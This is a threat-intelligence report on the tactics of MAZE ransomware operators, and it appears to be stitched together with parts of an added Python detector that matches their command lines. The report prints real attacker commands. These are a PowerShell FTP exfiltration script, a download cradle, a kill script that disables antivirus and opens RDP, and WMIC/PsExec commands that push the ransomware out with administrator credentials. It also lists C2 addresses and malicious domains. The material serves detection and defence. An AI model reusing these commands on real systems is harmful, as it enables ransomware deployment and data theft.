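    ("psexec_remote", "distribution script: PsExec remote execution (T1035)",
     r"\bpsexec(?:\.exe)?\s+\\\\\S+"),
    ("rdp_registry_enable", "kill script: fDenyTSConnections set to 0 (T1112, T1076)",
     r"\breg\s+add\b.*fDenyTSConnections.*\s/d\s+0\b"),
    ("rdp_firewall_enable", "kill script: 'remote desktop' firewall group enabled (T1076)",
     r'\bnetsh\s+advfirewall\s+firewall\s+set\s+rule\s+group="remote desktop"'),
    ("ps_download_cradle", "PowerShell -exec bypass download cradle (T1086)",
     r"\bpowershell(?:\.exe)?\b.*-exec(?:utionpolicy)?\s+bypass\b.*DownloadString\("),
    ("ftp_upload", "FTP upload helper invoked with an ftp:// target (T1048)",
     r"\bAdd-FtpFile\b.*\bftp://"),
    ("shadowcopy_delete", "WMIC SHADOWCOPY DELETE signature (T1490)",
     r"\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b"),
]
COMPILED = [(name, re.compile(pat, re.I)) for name, _, pat in RULES]
TECHNIQUE = {name: desc for name, desc, _ in RULES}

# The kill script is one taskkill/sc config line after another; a single such
# command is routine, so count them per host and alert on a burst (T1089).
KILL_PATTERN = re.compile(
    r"\btaskkill(?:\.exe)?\s+/im\s+\S+\s+/f\b|\bsc\s+config\s+\S+\s+start=\s*disabled\b", re.I)
KILL_THRESHOLD = 5  # constructed threshold; tune to the environment


def parse_event(line):
    """Split one constructed log line into its fields; None if malformed."""
    parts = line.split("|", 3)
    if len(parts) != 4:
        return None
    return {"ts": parts[0], "host": parts[1], "user": parts[2], "cmd": parts[3]}


def match_rules(cmd):
    """Names of every single-event rule matching a command line."""
    return [name for name, rx in COMPILED if rx.search(cmd)]


def analyze(lines):
    """Run all rules over log lines. Returns (hits, bursts): hits is one dict
    per matching rule and event; bursts maps each host whose kill/disable
    command count reached KILL_THRESHOLD to that count."""
    hits, kills = [], Counter()
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        for name in match_rules(ev["cmd"]):
            hits.append({**ev, "rule": name, "technique": TECHNIQUE[name]})
        if KILL_PATTERN.search(ev["cmd"]):
            kills[ev["host"]] += 1
    bursts = {host: n for host, n in kills.items() if n >= KILL_THRESHOLD}
    return hits, bursts


if __name__ == "__main__":
    found, burst_hosts = analyze(SAMPLE_EVENTS)
    for h in found:
        print(f"{h['ts']} {h['host']:6} {h['rule']:22} {h['technique']}")
    for host, n in burst_hosts.items():
        print(f"{host}: {n} kill/disable commands (>= {KILL_THRESHOLD}), "
              "kill-script burst (T1089 Disabling Security Tools)")
```

On the sample, the benign workstation produces no findings, the jump host trips the distribution-script rules, and the server trips the RDP, cradle, FTP and shadow-copy rules plus a seven-command kill burst.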

              Indicators of Compromise

              Maze Payloads


              Maze Check-in IPs


              Maze-related Domains

              aoacugmutagkwctu[.]onion

              mazedecrypt[.]top 

              mazenews[.]top

              newsmaze[.]top

              Maze Download URLs


              Malicious Documents


              BEACON C2s


              Cobalt Strike Binaries


              Meterpreter C2s

              5.199.167.188

              Other Related Files

              3A5A9D40D4592C344920DD082029B362 (related script)

              76f8f28bd51efa03ab992fdb050c8382 (MAZE execution artifact)

              b5aa49c1bf4179452a85862ade3ef317 (windows.bat kill script) 

              fad3c6914d798e29a3fd8e415f1608f4 (related script)

              Tools & Utilities

              27304b246c7d5b4e149124d5f93c5b01 (PsExec)

              42badc1d2f03a8b1e4875740d3d49336 (7zip)

              75b55bb34dac9d02740b9ad6b6820360 (PsExec)

              9b02dd2a1a15e94922be3f85129083ac (AdFind)

              c621a9f931e4ebf37dace74efcce11f2 (SMBTools)

              f413b4a2242bb60829c9a470eea4dfb6 (winRAR) 

              Email Sender Domains


              Sender Domain Registrant Addresses

              abusereceive@hitler.rocks

              gladkoff1991@yandex.ru

              Mandiant Threat Intelligence will host an exclusive webinar on Thursday, May 21, 2020, at 8 a.m. PT / 11 a.m. ET to provide updated insight and information into the MAZE ransomware threat, and to answer questions from attendees. Register today to reserve your spot.

              Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents

              Targeted ransomware incidents have brought a threat of disruptive and destructive attacks to organizations across industries and geographies. FireEye Mandiant Threat Intelligence has previously documented this threat in our investigations of trends across ransomware incidents, FIN6 activity, implications for OT networks, and other aspects of post-compromise ransomware deployment. Since November 2019, we’ve seen the MAZE ransomware being used in attacks that combine targeted ransomware use, public exposure of victim data, and an affiliate model.

              Malicious actors have been actively deploying MAZE ransomware since at least May 2019. The ransomware was initially distributed via spam emails and exploit kits before later shifting to being deployed post-compromise. Multiple actors are involved in MAZE ransomware operations, based on our observations of alleged users in underground forums and distinct tactics, techniques, and procedures across Mandiant incident response engagements. Actors behind MAZE also maintain a public-facing website where they post data stolen from victims who refuse to pay an extortion fee.

              The combination of these two damaging intrusion outcomes—dumping sensitive data and disrupting enterprise networks—with a criminal service makes MAZE a notable threat to many organizations. This blog post is based on information derived from numerous Mandiant incident response engagements and our own research into the MAZE ecosystem and operations.

              Mandiant Threat Intelligence will be available to answer questions on the MAZE ransomware threat in a May 21 webinar.

              Victimology

We are aware of more than 100 alleged MAZE victims reported by various media outlets and on the MAZE website since November 2019. These organizations have been primarily based in North America, although victims spanned nearly every geographical region. Nearly every industry sector, including manufacturing, legal, financial services, construction, healthcare, technology, retail, and government, has been impacted, demonstrating the indiscriminate nature of these operations (Figure 1).


              Figure 1: Geographical and industry distribution of alleged MAZE victims

              Multiple Actors Involved in MAZE Ransomware Operations Identified

Mandiant identified multiple Russian-speaking actors who claimed to use MAZE ransomware and were seeking partners to fulfill different functional roles within their teams. Additional information on these actors is available to Mandiant Intelligence subscribers. A panel used to manage victims targeted for MAZE ransomware deployment has a section for affiliate transactions. This activity is consistent with our assessment that MAZE operates under an affiliate model and is not distributed by a single group. Under this business model, ransomware developers partner with other actors (i.e. affiliates) who are responsible for distributing the malware. In these scenarios, when a victim pays the ransom demand, the ransomware developers receive a commission. Direct affiliates of MAZE ransomware also partner with other actors who perform specific tasks for a percentage of the ransom payment. This includes partners who provide initial access to organizations and pentesters who are responsible for reconnaissance, privilege escalation and lateral movement, each of whom appears to work on a percentage basis. Notably, in some cases, actors may be hired on a salary basis (rather than on commission) to perform specific tasks such as determining the victim organization and its annual revenues. This allows for specialization within the cyber criminal ecosystem, ultimately increasing efficiency, while still allowing all parties involved to profit.


              Figure 2: MAZE ransomware panel

              MAZE Initially Distributed via Exploit Kits and Spam Campaigns

              MAZE ransomware was initially distributed directly via exploit kits and spam campaigns through late 2019. For example, in November 2019, Mandiant observed multiple email campaigns delivering Maze ransomware primarily to individuals at organizations in Germany and the United States, although a significant number of emails were also delivered to entities in Canada, Italy, and South Korea. These emails used tax, invoice, and package delivery themes with document attachments or inline links to documents which download and execute Maze ransomware.

              On November 6 and 7, a Maze campaign targeting Germany delivered macro-laden documents using the subject lines “Wichtige informationen uber Steuerruckerstattung” and “1&1 Internet AG - Ihre Rechnung 19340003422 vom 07.11.19” (Figure 3). Recipients included individuals at organizations in a wide range of industries, with the Financial Services, Healthcare, and Manufacturing sectors being targeted most frequently. These emails were sent using a number of malicious domains created with the registrant address gladkoff1991@yandex.ru.


              Figure 3: German-language lure

On November 8, a campaign delivered Maze primarily to Financial Services and Insurance organizations located in the United States. These emails originated from a compromised or spoofed account and contained an inline link to download a Maze executable payload.

              On November 18 and 19, a Maze campaign targeted individuals operating in a range of industries in the United States and Canada with macro documents using phone bill and package delivery themes (Figure 4 and Figure 5). These emails used the subjects “Missed package delivery” and "Your AT&T wireless bill is ready to view" and were sent using a number of malicious domains with the registrant address abusereceive@hitler.rocks. Notably, this registrant address was also used to create multiple Italian-language domains towards the end of November 2019.


              Figure 4: AT&T email lure


              Figure 5: Canada Post email lure

              Shift to Post-Compromise Distribution Maximizes Impact

              Actors using MAZE have increasingly shifted to deploying the ransomware post-compromise. This methodology provides an opportunity to infect more hosts within a victim’s environment and exfiltrate data, which is leveraged to apply additional pressure on organizations to pay extortion fees. Notably, in at least some cases, the actors behind these operations charge an additional fee, in addition to the decryption key, for the non-release of stolen data.

Although the high-level intrusion scenarios preceding the distribution of MAZE ransomware are broadly similar, there have been notable variations across intrusions that suggest attribution to distinct teams. Even within these teams, the cyber criminals appear to be task-oriented, meaning that one operator is not responsible for the full lifecycle. The following sections highlight the TTPs seen in a subset of incidents and serve to illustrate the divergence that may occur because numerous, disparate actors are involved in different phases of these operations. Notably, the time from initial compromise to encryption has also varied widely, from weeks to many months.

              Initial Compromise

              There are few clear patterns for intrusion vector across analyzed MAZE ransomware incidents. This is consistent with our observations of multiple actors who use MAZE soliciting partners with network access. The following are a sample of observations from several Mandiant incident response engagements:

              • A user downloaded a malicious resume-themed Microsoft Word document that contained macros which launched an IcedID payload, which was ultimately used to execute an instance of BEACON.
              • An actor logged into an internet-facing system via RDP. The account used to grant initial access was a generic support account. It is unclear how the actor obtained the account's password.
              • An actor exploited a misconfiguration on an Internet-facing system. This access enabled the actor to deploy tools to pivot into the internal network.
              • An actor logged into a Citrix web portal account with a weak password. This authenticated access enabled the actor to launch a Meterpreter payload on an internal system.

              Establish Foothold & Maintain Presence

The use of legitimate credentials and broad distribution of BEACON across victim environments appear to be consistent approaches used by actors to establish their foothold in victim networks and to maintain presence as they look to meet their ultimate objective of deploying MAZE ransomware. Despite these commonplace behaviors, we have observed an actor create their own domain account to enable later-stage operations.

              • Across multiple incidents, threat actors deploying MAZE established a foothold in victim environments by installing BEACON payloads on many servers and workstations.
• Web shells were deployed to an internet-facing system. The system-level access granted by these web shells was used to enable initial privilege escalation and the execution of a backdoor.
              • Intrusion operators regularly obtained and maintained access to multiple domain and local system accounts with varying permissions that were used throughout their operations.
              • An actor created a new domain account and added it to the domain administrators group.

              Escalate Privileges

Although Mandiant has observed multiple cases where MAZE intrusion operators employed Mimikatz to collect credentials to enable privilege escalation, in multiple cases these efforts were also bolstered by the use of Bloodhound and by more manual searches for files containing credentials.

              • Less than two weeks after initial access, the actor downloaded and interacted with an archive named mimi.zip, which contained files corresponding to the credential harvesting tool Mimikatz. In the following days the same mimi.zip archive was identified on two domain controllers in the impacted environment.
              • The actor attempted to find files with the word “password” within the environment. Additionally, several archive files were also created with file names suggestive of credential harvesting activity.
              • The actor attempted to identify hosts running the KeePass password safe software.
              • Across multiple incidents, the Bloodhound utility was used, presumably to assess possible methods of obtaining credentials with domain administrator privileges.
              • Actors primarily used Procdump and Mimikatz to collect credentials used to enable later stages of their intrusion. Notably, both Bloodhound and PingCastle were also used, presumably to enable attackers' efforts to understand the impacted organization's Active Directory configuration. In this case the responsible actors also attempted to exfiltrate collected credentials to multiple different cloud file storage services.

              Reconnaissance

Mandiant has observed a broad range of approaches to network, host, data, and Active Directory reconnaissance across observed MAZE incidents. The varied tools and approaches across these incidents may best highlight the divergent ways in which the responsible actors interact with victim networks.

              • In some intrusions, reconnaissance activity occurred within three days of gaining initial access to the victim network. The responsible actor executed a large number of reconnaissance scripts via Cobalt Strike to collect network, host, filesystem, and domain related information.
              • Multiple built-in Windows commands were used to enable network, account, and host reconnaissance of the impacted environment, though the actors also supplied and used Advanced IP Scanner and Adfind to support this stage of their operations.
• Preliminary network reconnaissance was conducted using a batch script named '2.bat' which contained a series of nslookup commands. The output of this script was copied into a file named '2.txt'.
              • The actor exfiltrated reconnaissance command output data and documents related to the IT environment to an attacker-controlled FTP server via an encoded PowerShell script.
              • Over a period of several days, an actor conducted reconnaissance activity using Bloodhound, PowerSploit/PowerView (Invoke-ShareFinder), and a reconnaissance script designed to enumerate directories across internal hosts.
              • An actor employed the adfind tool and a batch script to collect information about the victim network, its hosts, domain, and users. The output from this batch script (2adfind.bat) was saved into an archive named 'ad.7z' using an instance of the 7zip archiving utility named 7.exe.
              • An actor used the tool smbtools.exe to assess whether accounts could log in to systems across the environment.
              • An actor collected directory listings from file servers across an impacted environment. Evidence of data exfiltration was observed approximately one month later, suggesting that the creation of these directory listings may have been precursor activity, providing the actors with data they may have used to identify sensitive data for future exfiltration.

              Lateral Movement

              Across the majority of MAZE ransomware incidents lateral movement was accomplished via Cobalt Strike BEACON and using previously harvested credentials. Despite this uniformity, some alternative tools and approaches were also observed.

              • Attackers relied heavily on Cobalt Strike BEACON to move laterally across the impacted environment, though they also tunneled RDP using the ngrok utility, and employed tscon to hijack legitimate RDP sessions to enable both lateral movement and privilege escalation.
              • The actor moved laterally throughout some networks leveraging compromised service and user accounts obtained from the system on which they gained their initial foothold. This allowed them to obtain immediate access to additional systems. Stolen credentials were then used to move laterally across the network via RDP and to install BEACON payloads providing the actors with access to nearly one hundred hosts.
              • An actor moved laterally using Metasploit and later deployed a Cobalt Strike payload to a system using a local administrator account.
              • At least one actor attempted to perform lateral movement using EternalBlue in early and late 2019; however, there is no evidence that these attempts were successful.

              Complete Mission

              There was evidence suggesting data exfiltration across most analyzed MAZE ransomware incidents. While malicious actors could monetize stolen data in various ways (e.g. sale in an underground forum, fraud), actors employing MAZE are known to threaten the release of stolen data if victim organizations do not pay an extortion fee.

              • An actor has been observed exfiltrating data to FTP servers using a base64-encoded PowerShell script designed to upload any files with .7z file extensions to a predefined FTP server using a hard-coded username and password. This script appears to be a slight variant of a script first posted to Microsoft TechNet in 2013.
              • A different base64-encoded PowerShell command was also used to enable this functionality in a separate incident.
              • Actors deploying MAZE ransomware have also used the utility WinSCP to exfiltrate data to an attacker-controlled FTP server.
              • An actor has been observed employing a file replication utility and copying the stolen data to a cloud file hosting/sharing service.
              • Prior to deploying MAZE ransomware threat actors employed the 7zip utility to archive data from across various corporate file shares. These archives were then exfiltrated to an attacker-controlled server via FTP using the WinSCP utility.

              In addition to data theft, actors deploy MAZE ransomware to encrypt files identified on the victim network. Notably, the aforementioned MAZE panel has an option to specify the date on which ransom demands will double, likely to create a sense of urgency to their demands.

              • Five days after data was exfiltrated from a victim environment the actor copied a MAZE ransomware binary to 15 hosts within the victim environment and successfully executed it on a portion of these systems.
              • Attackers employed batch scripts and a series of .txt files containing host names to distribute and execute MAZE ransomware on many servers and workstations across the victim environment.
              • An actor deployed MAZE ransomware to tens of hosts, explicitly logging into each system using a domain administrator account created earlier in the intrusion.
              • Immediately following the exfiltration of sensitive data, the actors began deployment of MAZE ransomware to hosts across the network. In some cases, thousands of hosts were ultimately encrypted. The encryption process proceeded as follows:
                • A batch script named start.bat was used to execute a series of secondary batch scripts with names such as xaa3x.bat or xab3x.bat.
                • Each of these batch scripts contained a series of commands that employed the copy command, WMIC, and PsExec to copy and execute a kill script (windows.bat) and an instance of MAZE ransomware (sss.exe) on hosts across the impacted environment.
                • Notably, forensic analysis of the impacted environment revealed MAZE deployment scripts targeting ten times as many hosts as were ultimately encrypted.

              Implications

              Based on our belief that the MAZE ransomware is distributed by multiple actors, we anticipate that the TTPs used throughout incidents associated with this ransomware will continue to vary somewhat, particularly in terms of the initial intrusion vector. For more comprehensive recommendations for addressing ransomware, please refer to our Ransomware Protection and Containment Strategies blog post and the linked white paper.

              Mandiant Security Validation Actions

              Organizations can validate their security controls against more than 20 MAZE-specific actions with Mandiant Security Validation. Please see our Headline Release Content Updates – April 21, 2020 on the Mandiant Security Validation Customer Portal for more information.

              • A100-877 - Active Directory - BloodHound, CollectionMethod All
              • A150-006 - Command and Control - BEACON, Check-in
              • A101-030 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #1
              • A101-031 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #2
              • A101-032 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #3
              • A100-878 - Command and Control - MAZE Ransomware, C2 Check-in
              • A100-887 - Command and Control - MAZE, DNS Query #1
              • A100-888 - Command and Control - MAZE, DNS Query #2
              • A100-889 - Command and Control - MAZE, DNS Query #3
              • A100-890 - Command and Control - MAZE, DNS Query #4
              • A100-891 - Command and Control - MAZE, DNS Query #5
              • A100-509 - Exploit Kit Activity - Fallout Exploit Kit CVE-2018-8174, Github PoC
              • A100-339 - Exploit Kit Activity - Fallout Exploit Kit CVE-2018-8174, Landing Page
              • A101-033 - Exploit Kit Activity - Spelevo Exploit Kit, MAZE C2
              • A100-208 - FTP-based Exfil/Upload of PII Data (Various Compression)
              • A104-488 - Host CLI - Collection, Exfiltration: Active Directory Reconnaissance with SharpHound, CollectionMethod All
              • A104-046 - Host CLI - Collection, Exfiltration: Data from Local Drive using PowerShell
              • A104-090 - Host CLI - Collection, Impact: Creation of a Volume Shadow Copy
              • A104-489 - Host CLI - Collection: Privilege Escalation Check with PowerUp, Invoke-AllChecks
              • A104-037 - Host CLI - Credential Access, Discovery: File & Directory Discovery
              • A104-052 - Host CLI - Credential Access: Mimikatz
              • A104-167 - Host CLI - Credential Access: Mimikatz (2.1.1)
              • A104-490 - Host CLI - Defense Evasion, Discovery: Terminate Processes, Malware Analysis Tools
              • A104-491 - Host CLI - Defense Evasion, Persistence: MAZE, Create Target.lnk
              • A104-500 - Host CLI - Discovery, Defense Evasion: Debugger Detection
              • A104-492 - Host CLI - Discovery, Execution: Antivirus Query with WMI, PowerShell
              • A104-374 - Host CLI - Discovery: Enumerate Active Directory Forests
              • A104-493 - Host CLI - Discovery: Enumerate Network Shares
              • A104-481 - Host CLI - Discovery: Language Query Using PowerShell, Current User
              • A104-482 - Host CLI - Discovery: Language Query Using reg query
              • A104-494 - Host CLI - Discovery: MAZE, Dropping Ransomware Note Burn Directory
              • A104-495 - Host CLI - Discovery: MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.html Variant
              • A104-496 - Host CLI - Discovery: MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.txt Variant
              • A104-027 - Host CLI - Discovery: Process Discovery
              • A104-028 - Host CLI - Discovery: Process Discovery with PowerShell
              • A104-029 - Host CLI - Discovery: Remote System Discovery
              • A104-153 - Host CLI - Discovery: Security Software Identification with Tasklist
              • A104-083 - Host CLI - Discovery: System Info
              • A104-483 - Host CLI - Exfiltration: PowerShell FTP Upload
              • A104-498 - Host CLI - Impact: MAZE, Desktop Wallpaper Ransomware Message
              • A104-227 - Host CLI - Initial Access, Lateral Movement: Replication Through Removable Media
              • A100-879 - Malicious File Transfer - Adfind.exe, Download
              • A150-046 - Malicious File Transfer - BEACON, Download
              • A100-880 - Malicious File Transfer - Bloodhound Ingestor Download, C Sharp Executable Variant
              • A100-881 - Malicious File Transfer - Bloodhound Ingestor Download, C Sharp PowerShell Variant
              • A100-882 - Malicious File Transfer - Bloodhound Ingestor Download, PowerShell Variant
              • A101-037 - Malicious File Transfer - MAZE Download, Variant #1
              • A101-038 - Malicious File Transfer - MAZE Download, Variant #2
              • A101-039 - Malicious File Transfer - MAZE Download, Variant #3
              • A101-040 - Malicious File Transfer - MAZE Download, Variant #4
              • A101-041 - Malicious File Transfer - MAZE Download, Variant #5
              • A101-042 - Malicious File Transfer - MAZE Download, Variant #6
              • A101-043 - Malicious File Transfer - MAZE Download, Variant #7
              • A101-044 - Malicious File Transfer - MAZE Download, Variant #8
              • A101-045 - Malicious File Transfer - MAZE Download, Variant #9
              • A101-034 - Malicious File Transfer - MAZE Dropper Download, Variant #1
              • A101-035 - Malicious File Transfer - MAZE Dropper Download, Variant #2
              • A100-885 - Malicious File Transfer - MAZE Dropper Download, Variant #4
              • A101-036 - Malicious File Transfer - MAZE Ransomware, Malicious Macro, PowerShell Script Download
              • A100-284 - Malicious File Transfer - Mimikatz W/ Padding (1MB), Download
              • A100-886 - Malicious File Transfer - Rclone.exe, Download
              • A100-484 - Scanning Activity - Nmap smb-enum-shares, SMB Share Enumeration

              Detecting the Techniques

              Platform | Signature Name
              MVX (covers multiple FireEye technologies) | Bale Detection; FE_Ransomware_Win_MAZE_1
              Endpoint Security | WMIC SHADOWCOPY DELETE (METHODOLOGY); MAZE RANSOMWARE (FAMILY)
              Network Security | Ransomware.Win.MAZE; Ransomware.Maze; Ransomware.Maze

              MITRE ATT&CK Mappings

              Mandiant currently tracks three separate clusters of activity involved in the post-compromise distribution of MAZE ransomware. Future data collection and analysis efforts may reveal additional groups involved in intrusion activity supporting MAZE operations, or may instead allow us to collapse some of these groups into larger clusters. It should also be noted that ‘initial access’ phase techniques have been included in these mappings, though in some cases this access may have been provided by a separate threat actor(s).

              MAZE Group 1 MITRE ATT&CK Mapping

              ATT&CK Tactic Category | Techniques
              Initial Access | T1133: External Remote Services; T1078: Valid Accounts
              Execution | T1059: Command-Line Interface; T1086: PowerShell; T1064: Scripting; T1035: Service Execution
              Persistence | T1078: Valid Accounts; T1050: New Service
              Privilege Escalation | T1078: Valid Accounts
              Defense Evasion | T1078: Valid Accounts; T1036: Masquerading; T1027: Obfuscated Files or Information; T1064: Scripting
              Credential Access | T1110: Brute Force; T1003: Credential Dumping
              Discovery | T1087: Account Discovery; T1482: Domain Trust Discovery; T1083: File and Directory Discovery; T1135: Network Share Discovery; T1069: Permission Groups Discovery; T1018: Remote System Discovery; T1016: System Network Configuration Discovery
              Lateral Movement | T1076: Remote Desktop Protocol; T1105: Remote File Copy
              Collection | T1005: Data from Local System
              Command and Control | T1043: Commonly Used Port; T1105: Remote File Copy; T1071: Standard Application Layer Protocol
              Exfiltration | T1002: Data Compressed; T1048: Exfiltration Over Alternative Protocol
              Impact | T1486: Data Encrypted for Impact; T1489: Service Stop

              MAZE Group 2 MITRE ATT&CK Mapping

              ATT&CK Tactic Category | Techniques
              Initial Access | T1193: Spearphishing Attachment
              Execution | T1059: Command-Line Interface; T1086: PowerShell; T1085: Rundll32; T1064: Scripting; T1204: User Execution; T1028: Windows Remote Management
              Persistence | T1078: Valid Accounts; T1050: New Service; T1136: Create Account
              Privilege Escalation | T1078: Valid Accounts; T1050: New Service
              Defense Evasion | T1078: Valid Accounts; T1140: Deobfuscate/Decode Files or Information; T1107: File Deletion; T1036: Masquerading
              Credential Access | T1003: Credential Dumping; T1081: Credentials in Files; T1171: LLMNR/NBT-NS Poisoning
              Discovery | T1087: Account Discovery; T1482: Domain Trust Discovery; T1083: File and Directory Discovery; T1135: Network Share Discovery; T1069: Permission Groups Discovery; T1018: Remote System Discovery; T1033: System Owner/User Discovery
              Lateral Movement | T1076: Remote Desktop Protocol; T1028: Windows Remote Management
              Collection | T1074: Data Staged; T1005: Data from Local System; T1039: Data from Network Shared Drive
              Command and Control | T1043: Commonly Used Port; T1219: Remote Access Tools; T1105: Remote File Copy; T1071: Standard Application Layer Protocol; T1032: Standard Cryptographic Protocol
              Exfiltration | T1020: Automated Exfiltration; T1002: Data Compressed; T1048: Exfiltration Over Alternative Protocol
              Impact | T1486: Data Encrypted for Impact

              MAZE Group 3 MITRE ATT&CK Mapping (FIN6)

              ATT&CK Tactic Category | Techniques
              Initial Access | T1133: External Remote Services; T1078: Valid Accounts
              Execution | T1059: Command-Line Interface; T1086: PowerShell; T1064: Scripting; T1035: Service Execution
              Persistence | T1078: Valid Accounts; T1031: Modify Existing Service
              Privilege Escalation | T1055: Process Injection; T1078: Valid Accounts
              Defense Evasion | T1055: Process Injection; T1078: Valid Accounts; T1116: Code Signing; T1089: Disabling Security Tools; T1202: Indirect Command Execution; T1112: Modify Registry; T1027: Obfuscated Files or Information; T1108: Redundant Access; T1064: Scripting
              Credential Access | T1003: Credential Dumping
              Discovery | T1087: Account Discovery; T1482: Domain Trust Discovery; T1083: File and Directory Discovery; T1069: Permission Groups Discovery; T1018: Remote System Discovery
              Lateral Movement | T1097: Pass the Ticket; T1076: Remote Desktop Protocol; T1105: Remote File Copy; T1077: Windows Admin Shares
              Collection | T1074: Data Staged; T1039: Data from Network Shared Drive
              Command and Control | T1043: Commonly Used Port; T1219: Remote Access Tools; T1105: Remote File Copy; T1071: Standard Application Layer Protocol; T1032: Standard Cryptographic Protocol
              Exfiltration | T1002: Data Compressed
              Impact | T1486: Data Encrypted for Impact; T1490: Inhibit System Recovery; T1489: Service Stop

              Example Commands Observed in MAZE Ransomware Incidents

              function Enum-UsersFolders($PathEnum)
              {
                  $foldersArr = 'Desktop','Downloads','Documents','AppData/Roaming','AppData/Local'

                  Get-ChildItem -Path $PathEnum'/c$' -ErrorAction SilentlyContinue
                  Get-ChildItem -Path $PathEnum'/c$/Program Files' -ErrorAction SilentlyContinue
                  Get-ChildItem -Path $PathEnum'/c$/Program Files (x86)' -ErrorAction SilentlyContinue

                  foreach($Directory in Get-ChildItem -Path $PathEnum'/c$/Users' -ErrorAction SilentlyContinue) {

                      foreach($SeachDir in $foldersArr) {
                          Get-ChildItem -Path $PathEnum'/c$/Users/'$Directory'/'$SeachDir -ErrorAction SilentlyContinue
                      }
                  }
              }

              PowerShell reconnaissance script used to enumerate directories

              $Dir="C:/Windows/Temp/"
              #ftp server
              $ftp = "ftp://<IP Address>/incoming/"
              $user = "<username>"
              $pass = "<password>"
              $webclient = New-Object System.Net.WebClient
              $webclient.Credentials = New-Object System.Net.NetworkCredential($user,$pass)
              #list every sql server trace file
              foreach($item in (dir $Dir "*.7z")){
                 "Uploading $item..."
                 $uri = New-Object System.Uri($ftp+$item.Name)
                 $webclient.UploadFile($uri, $item.FullName)
              }

              Decoded FTP upload PowerShell script

              powershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:43984/'); Add-FtpFile -ftpFilePath "ftp://<IP  Address>/cobalt_uploads/<file name>" -localFile "<local file path>\ <file name> " -userName "<username>" -password "<password>"

              Decoded FTP upload PowerShell script

              […]
              echo 7
              echo 7
              taskkill /im csrss_tc.exe /f
              taskkill /im kwsprod.exe /f
              taskkill /im avkwctl.exe /f
              taskkill /im rnav.exe /f
              taskkill /im crssvc.exe /f
              sc config CSAuth start= disabled
              taskkill /im vsserv.exe /f
              taskkill /im ppmcativedetection.exe /f
              […]
              taskkill /im sahookmain.exe /f
              taskkill /im mcinfo.exe /f
              reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
              netsh advfirewall firewall set rule group="remote desktop" new enable=Ye
              c:\windows\temp\sss.exe

              Excerpt from windows.bat kill script

              start copy sss.exe \\<internal IP>\c$\windows\temp\
              start copy sss.exe \\<internal IP>\c$\windows\temp\

              start copy windows.bat \\<internal IP>\c$\windows\temp\
              start copy windows.bat \\<internal IP>\c$\windows\temp\

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "c:\windows\temp\sss.exe"

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "c:\windows\temp\sss.exe"

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c c:\windows\temp\windows.bat"

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c c:\windows\temp\windows.bat"

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\sss.exe c:\windows\temp\"

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\sss.exe c:\windows\temp\"

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\windows.bat c:\windows\temp\"

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\windows.bat c:\windows\temp\"

              start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe

              start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe

              start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat

              start psexec.exe \\<internal IP> -u < DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat

              Example commands from MAZE distribution scripts

              @echo off
              del done.txt
              del offline.txt
              rem Loop thru list of computer names in file specified on command-line
              for /f %%i in (%1) do call :check_machine %%i
              goto end
              :check_machine
              rem Check to see if machine is up.
              ping -n 1 %1|Find "TTL=" >NUL 2>NUL
              if errorlevel 1 goto down
              echo %1
              START cmd /c "copy [Location of MAZE binary] \\%1\c$\windows\temp && exit"
              timeout 1 > NUL
              echo %1 >> done.txt
              rem wmic /node:"%1" process call create "regsvr32.exe /i C:\windows\temp\[MAZE binary name]" >> done.txt
              START "" cmd /c "wmic /node:"%1" process call create "regsvr32.exe /i C:\windows\temp\[MAZE binary name]" && exit"
              goto end
              :down
                rem Report machine down
                echo %1 >> offline.txt
              :end

              Example MAZE distribution script
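The distribution scripts and the windows.bat kill script above share a handful of command-line features (copies into \\host\c$\windows\temp, wmic /node ... process call create, PsExec with -accepteula, regsvr32 /i from windows\temp, bursts of taskkill /f, RDP switched on through the registry and firewall, PowerShell with -exec bypass) that a defender can alert on from process-creation telemetry. The following Python is an added example and not code from the original post or from Mandiant; the pipe-delimited log format, the rule names, the host names, IPs and accounts, and the sample events are all constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed process-creation events (not from any real incident), one per line:
# timestamp|host|user|command line. Hosts, IPs and accounts are placeholders.
SAMPLE_LOG = r"""
2020-04-21T01:40:00|FS07|CORP\adm_ops|powershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:43984/')
2020-04-21T02:10:01|JUMP01|CORP\adm_ops|cmd.exe /c start copy sss.exe \\10.1.4.22\c$\windows\temp\
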